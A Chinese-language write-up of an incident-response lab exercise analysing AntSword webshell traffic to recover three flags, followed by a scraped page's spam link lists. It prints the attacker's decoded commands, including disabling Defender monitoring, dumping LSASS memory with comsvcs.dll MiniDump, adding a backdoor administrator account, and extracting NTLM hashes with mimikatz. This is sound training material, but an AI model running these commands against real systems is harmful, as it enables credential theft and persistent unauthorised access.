当前位置: 首页 > wzjs >正文

深圳市公司网站建设平台买个网页多少钱

深圳市公司网站建设平台,买个网页多少钱,多用户wordpress插件,金塔凯元建设集团有限公司官方网站目录 一、测试环境 二、测试目的 三、操作过程 Flag1 Flag2 Flag3 四、结论 一、测试环境 靶场介绍:国内厂商设置的玄机靶场,以应急响应题目著名。 地址:https://xj.edisec.net/challenges/44 靶机简介: 二、测试目的 …

目录

一、测试环境

二、测试目的

三、操作过程

Flag1

Flag2

Flag3

四、结论


一、测试环境

靶场介绍:国内厂商设置的玄机靶场,以应急响应题目著名。

地址:https://xj.edisec.net/challenges/44

靶机简介:

二、测试目的

对附件数据包进行流量分析,按照题目要求找出对应的flag并提交。

三、操作过程

Flag1

进行流量分析,过滤http流量,发现product2.php是webshell流量

蚁剑使用的是base64加密,其中密文前两位是混淆字符,需要将每个包的命令执行语句进行解码,分析命令,找寻线索

所有命令解码如下:

C:/phpStudy/PHPTutorial/WWW/onlineshop/database/onlineshop.sql

cd /d “C:/phpStudy/PHPTutorial/WWW/onlineshop”&ls&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&whoami&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&whoami /priv&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&systeminfo&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:\temp&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net user&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net localgroup administrators&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net group “domain group” /domain&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net group “domain admins” /domain&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net view&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net share&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&rundll32.exe comsvcs.dll, MiniDump 852 C:\Temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:\temp&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&ls&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”© store.php c:\temp&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:\temp&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&powershell -ep bypass Set-Mppreference -DisableRaltimeMonitoring $true&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&rundll32.exe comsvcs.dll, MiniDump 852 C:\temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]

C:/Temp/OnlineShopBack.zip

cd /d “C:/phpStudy/PHPTutorial/WWW/onlineshop”&dir c:\windows\system32&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:\windows\config&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net user&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net user admin Password1 /add&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net localgroup administrators admin /add&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&whoami /all&echo [S]&cd&echo [E]

在length为4146的webshell流量包中,解码得到了创建admin账户的命令

解码得到密码:Password1

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net user admin Password1 /add&echo [S]&cd&echo [E]

Flag1:flag{Password1}

Flag2

在length为4172的webshell流量包中,解码得到了LSASS.exe的程序进程id,这也是命令中唯一的id号

rundll32.exe 可用于执行 DLL 文件,也能调用该文件中的内部函数,这里就调用了comsvcs.dll中的MiniDump函数。

Comsvcs.dll的minidump函数可以创建内存转储文件,包含了系统内存的快照,可能包含敏感信息,攻击者使用这个函数获取身份验证信息。

而LSASS.exe进程,负责本地安全策略以及用户身份验证。经常成为攻击者的目标。因此这条命令正是调用该进程的命令,进程id是852

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&rundll32.exe comsvcs.dll, MiniDump 852 C:\temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]

Flag2:flag{852}

Flag3

根据对命令执行的分析,攻击者导出身份验证信息在文件:C:\temp\OnlineShopBackup.zip

可以将http流量包导出,分离出该文件。从最大的文件开始导出分析,导出为dmp文件

由于是蚁剑流量,文件头有多余字节,需要将文件头的e1c1709删除。删除后就是dmp文件的特征。(如果发现mimikatz没报错,也没读取成功,就重新导出,先保存为php文件,删除多余字符后保存为dmp文件试试)

 mimikatz的GitHub地址:https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.ziphttps://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip 使用mimikatz识别dmp文件,需要注意:mimikatz管理员权限启动;mimikatz的版本是2022,不然也解密不出;

sekurlsa::minidump mima.dmp
sekurlsa::logonpasswords

成功读取信息,win101的NTML:282d975e35846022476068ab5a3d72df

解密得到用户win101的密码:admin#123

Flag3:flag{admin#123}

四、结论

流量分析的操作有时候很枯燥,但是不可或缺。需要耐心完成工作,确保不遗漏信息。

熟悉了获取主机身份信息的命令,以及mimikatz工具的使用方法。


文章转载自:

http://n8xG0yib.bwjws.cn
http://Pbrqktd6.bwjws.cn
http://7BaHTPiZ.bwjws.cn
http://vwz0DxE4.bwjws.cn
http://u8XW2oYA.bwjws.cn
http://TRzULFsK.bwjws.cn
http://oc4GWiMH.bwjws.cn
http://9SSJHAbo.bwjws.cn
http://T85L2uKu.bwjws.cn
http://P5cHozuo.bwjws.cn
http://PAb8hEyP.bwjws.cn
http://85GGdcRe.bwjws.cn
http://nfGJfP5L.bwjws.cn
http://uhKNt87w.bwjws.cn
http://70vh9Wyt.bwjws.cn
http://pP2W0Weo.bwjws.cn
http://11J3kE5X.bwjws.cn
http://M3koS9Qk.bwjws.cn
http://oDZmB0Ql.bwjws.cn
http://A3VlEmm1.bwjws.cn
http://N3J5SqfW.bwjws.cn
http://bIqC4nPC.bwjws.cn
http://DKMPgtiT.bwjws.cn
http://H1B7jZjj.bwjws.cn
http://cRvLpMJs.bwjws.cn
http://BTUawjen.bwjws.cn
http://5Jn8DUC5.bwjws.cn
http://V1tWsnC3.bwjws.cn
http://sS9fgxjr.bwjws.cn
http://rICXDSnS.bwjws.cn
http://www.dtcms.com/wzjs/665366.html

相关文章:

  • 锦州网站建设锦州设计师在线接单
  • 苏州网站建设提供商快餐小吃加盟方案
  • 基于o2o的旅游网站建设新乡市建设工程网站
  • 2345网址导航站建筑优化公司排名
  • 正规网站制作全包html网页设计主题大全
  • 做任务什么网站硬件开发是什么专业
  • 营销型企业网站 网络服务电商网站建设费用
  • 网站微信推广怎么做如何做好网站seo优化
  • 国际设计师网站有哪些wordpress定义
  • 电子网站建设ppt百度seo招聘
  • 网站开发三层架构的系统wordpress点击分享功能
  • 东莞注塑切水口东莞网站建设福田住房和建设局网站官网
  • 毕节城乡建设局网站查询优化服务公司
  • 省水利工程建设信息网站芯片设计公司
  • 视频网站开发周期网站开发语言太老
  • it 网站模板营销最好的方法
  • 网站建设公司需要具备什么做公司网站哪家 上海
  • 免费建站系统wordpress上海监理建设协会网站
  • 天津网站建设网站推广wordpress woocommerce 插件
  • 网站开发工作分解结构二建证从住房建设厅网站调出流程
  • 英文营销网站wordpress 4.5.4
  • 厦门网站设计多少钱优秀设计作品赏析
  • 杭州定制网站三门峡网站建设费用
  • 让别人做网站推广需要多少钱网站建设建材
  • 做app网站设计王烨妮
  • 网站开发凭证做什么科目seddog站长之家
  • 郑州商务网站建设电子商城建设
  • 网站网络优化外包工业设计专业就业方向
  • 广州网站建设好公司网站收录代做
  • 长春做网站电话wordpress字号修改